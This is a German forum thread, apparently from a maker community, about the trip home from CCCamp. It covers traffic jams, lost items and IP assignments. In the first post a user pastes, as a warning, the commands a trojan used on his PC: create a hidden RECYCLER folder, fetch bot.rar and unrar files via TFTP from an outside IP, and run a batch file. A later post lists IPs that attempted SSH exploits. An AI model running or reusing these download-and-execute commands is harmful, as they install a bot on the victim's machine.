Hallo zusammen!
Die Rückfahrt war echt heftig...
Erst sind wir auf der A10 geblitzt worden (20km/h drüber) und standen dann auf der A2 in einem Stau. Ein Auto brannte auf der A2 bei Magdeburg... 3 Stunden tat sich garnichts, dann sollten alle Autos auf der Bahn wenden und die nächste Ausfahrt runterfahren. Insgesamt 6 1/2 Stunden hat es gedauert, bis wir wieder auf der A2 waren um zu bemerken, dass die Sperrung längst wieder weg war...
Um 2:30 waren wir dann wieder Zuhause
Weiss von euch jemand zufällig, wer die IP 81.161.134.174 hatte? Habe da einen netten Trojaner her, der sich von dieser IP installiert und wild in der Gegend rumgefunkt hat.
So hat sich das Teil installiert:
-------------8<-------------8<-------------8<-------------8<-------------
mkdir C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
TFTP -i 81.161.134.174 GET bot.rar
TFTP -i 81.161.134.174 GET unrar.bat
TFTP -i 81.161.134.174 GET unrar.exe
start unrar.bat
exit
-------------8<-------------8<-------------8<-------------8<-------------
Im Taskmanager war das ganze als winole.exe und sfind.exe sichtbar.
Nur zur Info, falls sich noch jemand anderes das Teil "eingefangen" hat.
viele Grüsse,
Kai
Life after CCCamp ;)
Re: Life after CCCamp ;)
Wem sagst du das? Vor uns hatte sich auf der A9 ein LKW mal schnell quer auf der Strasse schlafengelegt. 2 Stunden warten, 20-25 Baustellen ind Deutschland, und ~80 km noch nicht fertig gebastelte Autubahn in Österreich...Xyphro wrote:Hallo zusammen!
Die Rückfahrt war echt heftig...
War auf jeden Fall einer aus der BlinkenArea. Da hatte ich einen Fix-Peer drauf. 1stein hatte Linux, die Kollegen im Zelt nebenan einen DynPeer. Wäre eigentlich nur das Haus oder die BlinkenBoardler, die in Frage kommen. (174 war zwar meiner Einschätzung nach deiner, aber der Virus wird sich wohl nicht von deinem Rechner aus wieder auf deinen installiert haben).Xyphro wrote: Weiss von euch jemand zufällig, wer die IP 81.161.134.174 hatte? Habe da einen netten Trojaner her, der sich von dieser IP installiert und wild in der Gegend rumgefunkt hat.
Kai
LLAP & LG
Rene
Email-Adressen
Bitte schickt mit doch ein kurzes Mail an
"cavac AT grumpfzotz.org"
damit ich eure Mailadressen habe
"cavac AT grumpfzotz.org"
damit ich eure Mailadressen habe
Ohje, da haben wir ja richtig Glück mit der Rückahrt gehabt... Lief' eigentlich alles glatt...
Ein paar Sachen sind aber wohl am falschen Ort gelandet, Ich vermisse eins meiner Messer und sphaera vermisst ihr Handy. Ich habe dafür einen Seitenschneider mit roten Griffen, einen roten Schlitz-Schraubendreher mit gelbem Muster auf dem Griff und einen roten STADA-Kugelschreiber mitgenommen, da diese Sachen nachher noch irgendwie da waren. Das können wir dann ja beim Kongress zurücktauschen.
folgende IPs konnte ich (aus meinen Logfiles) zuordnen:
1stein's Notebook: 81.161.150.32, 81.161.150.75, 81.161.189.187
BLINKENmini-Rechner: 81.161.134.172
cavac's Rechner: 81.161.135.147
BastelWastel: 81.161.135.160
versuchte Exploits auf meinen ssh-port: 81.161.135.227, 81.161.134.237, 81.161.134.57, 81.161.148.185
Mehr Infos habe ich leider nicht.
Gruß,
1stein
Ein paar Sachen sind aber wohl am falschen Ort gelandet, Ich vermisse eins meiner Messer und sphaera vermisst ihr Handy. Ich habe dafür einen Seitenschneider mit roten Griffen, einen roten Schlitz-Schraubendreher mit gelbem Muster auf dem Griff und einen roten STADA-Kugelschreiber mitgenommen, da diese Sachen nachher noch irgendwie da waren. Das können wir dann ja beim Kongress zurücktauschen.
folgende IPs konnte ich (aus meinen Logfiles) zuordnen:
1stein's Notebook: 81.161.150.32, 81.161.150.75, 81.161.189.187
BLINKENmini-Rechner: 81.161.134.172
cavac's Rechner: 81.161.135.147
BastelWastel: 81.161.135.160
versuchte Exploits auf meinen ssh-port: 81.161.135.227, 81.161.134.237, 81.161.134.57, 81.161.148.185
Mehr Infos habe ich leider nicht.
Gruß,
1stein
Hmm ich habe bisher nichts gefunden, dass nicht mir gehört Sorry ;( Sollte ich noch etwas finden melde ich mich. Hätte ich das Handy gehabt wäre es mir schon aufgefallen, ein Messer auch!
Ich hoffe Ihr findet es noch!
Liebe Grüße Ina
PS: Kai hat auch nichts gefunden und meint, dass er auch seine Seitenschneider habe ...
Ich hoffe Ihr findet es noch!
Liebe Grüße Ina
PS: Kai hat auch nichts gefunden und meint, dass er auch seine Seitenschneider habe ...
Auch hier "fundsachen"
[quote="1stein"]Ohje, da haben wir ja richtig Glück mit der Rückahrt gehabt... Lief' eigentlich alles glatt...
Ein paar Sachen sind aber wohl am falschen Ort gelandet, Ich vermisse eins meiner Messer und sphaera vermisst ihr Handy.
Ich hätte hier Kai's Feuerzeug zum anbieten, ist aber schon leergeraucht
Ansonsten schauts bei mir ziemlich OK aus; falls jemand ein Kaltgeräte-Stromkabel o.ä. vermisst: Ich hatte eine Menge mitgenommen und eine Menge zurückgebracht, jedoch nicht gezählt...
LLAP & LG
Rene
Ein paar Sachen sind aber wohl am falschen Ort gelandet, Ich vermisse eins meiner Messer und sphaera vermisst ihr Handy.
Ich hätte hier Kai's Feuerzeug zum anbieten, ist aber schon leergeraucht
Ansonsten schauts bei mir ziemlich OK aus; falls jemand ein Kaltgeräte-Stromkabel o.ä. vermisst: Ich hatte eine Menge mitgenommen und eine Menge zurückgebracht, jedoch nicht gezählt...
LLAP & LG
Rene